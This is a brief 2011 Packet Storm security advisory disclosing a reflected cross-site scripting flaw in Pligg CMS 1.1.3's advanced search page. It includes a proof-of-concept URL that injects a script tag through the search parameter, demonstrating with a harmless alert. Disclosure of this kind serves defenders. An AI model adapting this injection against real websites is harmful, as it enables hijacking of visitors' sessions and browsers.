Pligg CMS 1.1.3 Cross Site Scripting

2011-02-01T00:00:00
ID PACKETSTORM:98052
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-01T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Pligg CMS 1.1.3  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://www.pligg.com  
Release Date............1/30/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in Pligg CMS 1.1.3 can  
be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
http://localhost/pligg/advancedsearch.php?search=%3C/title%3E%3Cscript%3Ealert(0)%3C/script%3E  
`